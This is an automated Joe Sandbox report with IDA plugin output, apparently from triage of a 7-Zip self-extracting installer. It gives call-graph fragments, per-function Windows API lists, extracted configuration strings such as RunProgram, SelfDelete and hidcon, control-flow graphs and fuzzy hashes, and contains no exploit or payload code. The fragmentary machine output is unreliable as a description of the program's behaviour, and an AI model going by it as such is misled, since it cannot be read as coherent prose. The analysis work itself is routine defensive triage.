9911->9910 9916 4015a3 9912->9916 9919 401594 9912->9919 9914 4015b3 9913->9914 9915 4015bf GetExitCodeThread 9913->9915 9914->9523 9917 4015d6 9915->9917 9918 407776 55 API calls 9916->9918 9917->9914 9917->9919 9920 401605 SetLastError 9917->9920 9918->9914 9919->9914 9921 407776 55 API calls 9919->9921 9920->9919 9921->9914 9923 401411 2 API calls 9922->9923 9924 4042ab 9923->9924 9925 401411 2 API calls 9924->9925 9926 4042b7 9925->9926 9926->9518 9940 40f0b6 9927->9940 9929 40b192 9929->9884 9930 40b17e 9930->9929 9943 40adc3 9930->9943 9933 40b297 ??3@YAXPAX 9933->9929 9934 40b2a2 ??3@YAXPAX 9934->9929 9936 40b27a memmove 9937 40b1d9 9936->9937 9937->9933 9937->9934 9937->9936 9938 40b2ac memcpy 9937->9938 9939 40dcfb 3 API calls 9938->9939 9939->9934 9951 40f06b 9940->9951 9944 40add0 9943->9944 9945 40ae0d memcpy 9943->9945 9946 40add5 ??2@YAPAXI 9944->9946 9947 40adfb 9944->9947 9945->9937 9948 40adfd ??3@YAXPAX 9946->9948 9949 40ade5 memmove 9946->9949 9947->9948 9948->9945 9949->9948 9952 40f0af 9951->9952 9953 40f07d 9951->9953 9952->9930 9953->9952 9954 40dcc7 GetLastError 9953->9954 9954->9953 9966 40c9fc 9955->9966 10362 40a28e 9958->10362 9988 40a0bf 9966->9988 10111 40a030 9988->10111 10112 40e8da ctype 3 API calls 10111->10112 10113 40a039 10112->10113 10114 40e8da ctype 3 API calls 10113->10114 10115 40a041 10114->10115 10116 40e8da ctype 3 API calls 10115->10116 10117 40a049 10116->10117 10118 40e8da ctype 3 API calls 10117->10118 10119 40a051 10118->10119 10120 40e8da ctype 3 API calls 10119->10120 10121 40a059 10120->10121 10122 40e8da ctype 3 API calls 10121->10122 10123 40a061 10122->10123 10124 40e8da ctype 3 API calls 10123->10124 10125 40a06b 10124->10125 10126 40e8da ctype 3 API calls 10125->10126 10127 40a073 10126->10127 10128 40e8da ctype 3 API calls 10127->10128 10129 40a080 10128->10129 10130 40e8da ctype 3 API calls 10129->10130 10131 40a088 10130->10131 10132 40e8da ctype 3 API calls 10131->10132 10133 40a095 10132->10133 10134 40e8da ctype 3 API calls 10133->10134 10135 40a09d 10134->10135 10136 40e8da ctype 3 API calls 10135->10136 10137 40a0aa 10136->10137 10138 40e8da ctype 3 API calls 10137->10138 10139 40a0b2 10138->10139 10363 40e8da ctype 3 API calls 10362->10363 10364 40a29c 10363->10364 10380 4012a5 10379->10380 10381 4012b8 10379->10381 10380->10381 10382 4012a7 Sleep 10380->10382 10383 4012f1 10381->10383 10384 4012e3 EndDialog 10381->10384 10382->10380 10384->10383 10386 4021db 10385->10386 10386->9530 10388 4025ae 2 API calls 10387->10388 10389 402992 10388->10389 10390 4029be 10389->10390 10391 402640 2 API calls 10389->10391 10390->9599 10391->10389 10392->9599 10394 4029d2 10393->10394 10395 4029de 10393->10395 10412 4019f0 GetStdHandle WriteFile 10394->10412 10397 4025ae 2 API calls 10395->10397 10401 4029e8 10397->10401 10398 4029d9 10410 402425 ??3@YAXPAX ??3@YAXPAX 10398->10410 10399 402a13 10400 40272e 3 API calls 10399->10400 10402 402a25 10400->10402 10401->10399 10405 402640 2 API calls 10401->10405 10403 402a33 10402->10403 10404 402a47 10402->10404 10406 407776 55 API calls 10403->10406 10407 407776 55 API calls 10404->10407 10405->10401 10408 402a42 ??3@YAXPAX ??3@YAXPAX 10406->10408 10407->10408 10408->10398 10410->9596 10411->9585 10412->10398 10414 4012f7 2 API calls 10413->10414 10415 402676 10414->10415 10416 4012f7 2 API calls 10415->10416 10417 402682 10416->10417 10417->9617 10419 4025ae 2 API calls 10418->10419 10420 402785 10419->10420 10421 4027c1 10420->10421 10424 402628 10420->10424 10421->9644 10425 402634 10424->10425 10426 40263a WideCharToMultiByte 10424->10426 10427 4022b0 2 API calls 10425->10427 10426->10421 10427->10426 10429 407456 10428->10429 10430 40745b 10428->10430 10429->9665 10430->10429 10431 4073d1 21 API calls 10430->10431 10431->10429 10432->9672 10433->9674 10434->9676 10435->9678 10436->9684 10437->9686 10438->9690 10439->9694 10441 40661a 2 API calls 10440->10441 10442 40715c 10441->10442 10442->9702 10446 40716d 10443->10446 10447 40661a 2 API calls 10446->10447 10448 407175 10447->10448 10448->9702 10450 40661a 2 API calls 10449->10450 10451 4071a7 10450->10451 10451->9728 8032 40f3f1 8035 4024e7 8032->8035 8040 40245a 8035->8040 8038 4024f5 8039 4024f6 malloc 8041 40246a 8040->8041 8047 402466 8040->8047 8042 40247a GlobalMemoryStatusEx 8041->8042 8041->8047 8043 402488 8042->8043 8042->8047 8043->8047 8048 401f9d 8043->8048 8047->8038 8047->8039 8049 401fb4 8048->8049 8050 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8049->8050 8051 401fdb 8049->8051 8052 402095 SetLastError 8050->8052 8053 40201d ??2@YAPAXI GetEnvironmentVariableW 8050->8053 8068 407717 8051->8068 8052->8051 8058 4020ac 8052->8058 8054 40204c GetLastError 8053->8054 8067 40207e ??3@YAXPAX 8053->8067 8055 402052 8054->8055 8054->8067 8061 402081 8055->8061 8062 40205c lstrcmpiW 8055->8062 8057 4020cb lstrlenA ??2@YAPAXI 8059 402136 MultiByteToWideChar 8057->8059 8060 4020fc GetLocaleInfoW 8057->8060 8058->8057 8075 401f47 8058->8075 8059->8051 8060->8059 8065 402123 _wtol 8060->8065 8061->8052 8066 40206b ??3@YAXPAX 8062->8066 8062->8067 8064 4020c1 8064->8057 8065->8059 8066->8061 8067->8061 8082 40661a 8068->8082 8071 40773c IsBadReadPtr 8073 40774e 8071->8073 8086 4073d1 8073->8086 8076 401f51 GetUserDefaultUILanguage 8075->8076 8077 401f95 8075->8077 8078 401f72 GetSystemDefaultUILanguage 8076->8078 8079 401f6e 8076->8079 8077->8064 8078->8077 8080 401f7e GetSystemDefaultLCID 8078->8080 8079->8064 8080->8077 8081 401f8e 8080->8081 8081->8077 8083 406643 8082->8083 8084 40666f IsWindow 8082->8084 8083->8084 8085 40664b GetSystemMetrics GetSystemMetrics 8083->8085 8084->8071 8084->8073 8085->8084 8087 4073e0 8086->8087 8088 407444 8086->8088 8087->8088 8098 4024fc 8087->8098 8088->8047 8090 4073f1 8091 4024fc 2 API calls 8090->8091 8092 4073fc 8091->8092 8102 403b7f 8092->8102 8095 403b7f 19 API calls 8096 40740e ??3@YAXPAX ??3@YAXPAX 8095->8096 8096->8088 8099 402513 8098->8099 8111 40112b 8099->8111 8101 40251e 8101->8090 8175 403880 8102->8175 8104 403b59 8116 40393b 8104->8116 8106 403b69 8139 4039f6 8106->8139 8108 403b74 8162 4027c7 8108->8162 8112 401177 8111->8112 8113 401139 ??2@YAPAXI 8111->8113 8112->8101 8113->8112 8115 40115a 8113->8115 8114 40116f ??3@YAXPAX 8114->8112 8115->8114 8115->8115 8198 401411 8116->8198 8120 403954 8205 40254d 8120->8205 8122 403961 8123 4024fc 2 API calls 8122->8123 8124 40396e 8123->8124 8209 403805 8124->8209 8127 401362 2 API calls 8128 403992 8127->8128 8129 40254d 2 API calls 8128->8129 8130 40399f 8129->8130 8131 4024fc 2 API calls 8130->8131 8132 4039ac 8131->8132 8133 403805 3 API calls 8132->8133 8134 4039bc ??3@YAXPAX 8133->8134 8135 4024fc 2 API calls 8134->8135 8136 4039d3 8135->8136 8137 403805 3 API calls 8136->8137 8138 4039e2 ??3@YAXPAX ??3@YAXPAX 8137->8138 8138->8106 8140 401411 2 API calls 8139->8140 8141 403a04 8140->8141 8142 401362 2 API calls 8141->8142 8143 403a0f 8142->8143 8144 40254d 2 API calls 8143->8144 8145 403a1c 8144->8145 8146 4024fc 2 API calls 8145->8146 8147 403a29 8146->8147 8148 403805 3 API calls 8147->8148 8149 403a39 ??3@YAXPAX 8148->8149 8150 401362 2 API calls 8149->8150 8151 403a4d 8150->8151 8152 40254d 2 API calls 8151->8152 8153 403a5a 8152->8153 8154 4024fc 2 API calls 8153->8154 8155 403a67 8154->8155 8156 403805 3 API calls 8155->8156 8157 403a77 ??3@YAXPAX 8156->8157 8158 4024fc 2 API calls 8157->8158 8159 403a8e 8158->8159 8160 403805 3 API calls 8159->8160 8161 403a9d ??3@YAXPAX ??3@YAXPAX 8160->8161 8161->8108 8163 401411 2 API calls 8162->8163 8164 4027d5 8163->8164 8165 4027e5 ExpandEnvironmentStringsW 8164->8165 8166 40112b 2 API calls 8164->8166 8167 402809 8165->8167 8168 4027fe ??3@YAXPAX 8165->8168 8166->8165 8234 402535 8167->8234 8169 402840 8168->8169 8169->8095 8172 402824 8173 401362 2 API calls 8172->8173 8174 402838 ??3@YAXPAX 8173->8174 8174->8169 8176 401411 2 API calls 8175->8176 8177 40388e 8176->8177 8178 401362 2 API calls 8177->8178 8179 403899 8178->8179 8180 40254d 2 API calls 8179->8180 8181 4038a6 8180->8181 8182 4024fc 2 API calls 8181->8182 8183 4038b3 8182->8183 8184 403805 3 API calls 8183->8184 8185 4038c3 ??3@YAXPAX 8184->8185 8186 401362 2 API calls 8185->8186 8187 4038d7 8186->8187 8188 40254d 2 API calls 8187->8188 8189 4038e4 8188->8189 8190 4024fc 2 API calls 8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188
                                              APIs
                                                • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                                • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                              • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                              • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT ref: 00402ADC
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT ref: 00402AF7
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT ref: 00402AFF
                                                • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT ref: 00402B6F
                                                • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                                • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                              • _wtol.MSVCRT(-00000002,00000000,?,00000000), ref: 0040509F
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004050F1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405102
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040510A
                                              • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                              • _wtol.MSVCRT(-00000002,?,00000000), ref: 00405217
                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040538F
                                                • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT ref: 00404E85
                                                • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT ref: 00404EAB
                                                • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                • Part of subcall function 00402844: memcmp.MSVCRT ref: 004028E4
                                                • Part of subcall function 00402844: memcmp.MSVCRT ref: 00402921
                                                • Part of subcall function 00402844: memmove.MSVCRT ref: 00402953
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405453
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040545B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405463
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004054DD
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004054E5
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004054ED
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405509
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405511
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405519
                                                • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT ref: 00403347
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405559
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405561
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405569
                                                • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                              • wsprintfW.USER32 ref: 00405595
                                              • _wtol.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 004057DE
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040587B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405883
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040588B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405913
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405938
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004059AA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004059B2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004059BA
                                              • CoInitialize.OLE32(00000000), ref: 004059E9
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405A30
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405A38
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405A40
                                              • GetKeyState.USER32(00000010), ref: 00405AA1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405BCD
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405BDB
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405BE3
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C16
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C1E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C26
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C2E
                                              • memset.MSVCRT ref: 004060AE
                                              • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                              • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004061D4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004061DC
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004061E4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004061EA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004061FD
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406205
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406222
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040622A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406232
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040623A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406242
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040624A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406252
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040626E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406276
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405BEB
                                                • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT ref: 00407817
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?), ref: 0040782D
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50), ref: 0040783E
                                                • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT ref: 00407847
                                                • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C4A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C52
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C5A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C62
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405C94
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405CD4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405D41
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405D49
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405D51
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405D59
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405E20
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405E28
                                              • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405EEC
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00405EF4
                                              • _wtol.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00417788), ref: 00405F65
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406294
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040629C
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062A4
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062AA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062B2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062BA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062C2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062CA
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062D2
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062F1
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004062F9
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406301
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406307
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040636D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 004063E6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040643D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406445
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040644D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406455
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040646A
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040647B
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00406483
                                              • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                              • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                              • API String ID: 154539431-3058303289
                                              • Opcode ID: 3be643ecf8404ee700b098a2c7f6930903e00dea054e3d68a5ef5f2141237405
                                              • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                              • Opcode Fuzzy Hash: 3be643ecf8404ee700b098a2c7f6930903e00dea054e3d68a5ef5f2141237405
                                              • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017eb call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 710->697 716 4017f1-4017f3 710->716 715 401804-401809 711->715 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04a01739e731db22ce718ae52e31260c022a55456e0f16d2664a2019743a4110
                                              • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                              • Opcode Fuzzy Hash: 04a01739e731db22ce718ae52e31260c022a55456e0f16d2664a2019743a4110
                                              • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                              • SetLastError.KERNEL32(00000010), ref: 0040303D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 1799206407-0
                                              • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                              • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                              • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                              • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                              APIs
                                              • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                              • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                              Memory Dump Source
